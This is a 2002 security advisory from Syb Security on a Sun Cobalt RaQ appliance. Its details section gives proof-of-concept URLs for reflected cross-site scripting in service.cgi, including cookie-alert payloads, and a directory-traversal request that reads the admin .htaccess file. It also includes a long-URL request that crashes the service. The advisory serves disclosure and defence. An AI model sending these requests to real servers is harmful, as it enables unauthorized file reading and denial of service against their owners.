© Neurowork™ 2010. Todos los derechos reservados.
Syb Security
es una unidad de negocio de Neurowork™ |
Otras unidades de negocio
Acerca de Neurowork™ | Mapa del sitio | Términos de uso | Marcas registradas | Política de privacidad | Comentarios
redlink Buscar
 redlink Seleccione Idioma
print e-mail sitemap
Bookmark and Share

Advisories

SYBSEC-ADV12: Sun Cobalt RaQ Directory Traversal File Reading Vulnerability

Title
Sun Cobalt RaQ Directory Traversal File Reading Vulnerability
ID
SYBSEC-ADV12
Severity
HIGH - Directory Traversal File Reading Vulnerability
History
20.FEB.2002 Vulnerability discovered
28.FEB.2002 Vendor contacted
Scope
Directory Traversal File Reading Vulnerability
Platforms
Sun Cobalt RaQ
Author
URL
http://www.sybsecurity.com/advisors/SYBSEC-ADV12-Sun_Cobalt_RaQ_Directory_Traversal_File_Reading_Vulnerability
Release
Public
Overview
RaQ is a server appliance originally developed by Cobalt. It is now distributed and maintained by Sun Microsystems.
Affected versions
The vulnerability has been reported in versions COBALT Server

Cobalt RaQ 4.0
Cobalt RaQ 3.0
Cobalt RaQ 2.0
Description
The Cobalt RaQ appliances are vulnerable to a directory traversal attack. Using this attack, it is possible for a remote user to read sensitive configuration files, such as .htaccess files, and could potentially result in unauthorized access to restricted information. It is unknown whether this attack will permit escape of the HTTP root directory.
Workaround
Upgrade the sofware version you can download from:
http://www.sun.com
Acknowledgments
This vulnerability have been found and researched by:
- Alex Hernandez <ahernandez [at] sybsecurity [dot] com>
References
Details
"
EXAMPLES:

http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<h1>Hello!</h1><script>alert('hello')</script>
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Microsoft hole')</script>
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<img src=javascript:alert(document.domain)>
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert(document.cookie)</script>

LOCATION:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.location)%3C/script%3E

COOKIES:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.cookie)%3C/script%3E

TAG IMAGES:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<img src=javascript:alert(document.domain)>

WRITE ON DOCUMENT:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<SCRIPT>document.write(document.domain)</SCRIPT>

------oOo--------

Traversal File configuration.

Exploit:
http://10.0.0.1:81/.cobalt/sysManage/../admin/.htaccess

# Access file for /usr/admserv/html/.cobalt/admin/ (admin )
order allow,deny
allow from all
require user admin
Authname CobaltRaQ
Authtype Basic

Directory by Default on server is: "/usr/admserv/html/.cobalt/admin" you can translate to any directory for capture restricted files or passwords and profiles the users.

------oOo--------

Denial Of service.

Proof Of concept:

Server crashes after sending a very long URL:

Example:

http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=/AAAAAAAAA...(Ax100000)...AAA

Crash system and the admin need restart the service!. "
Exploit tool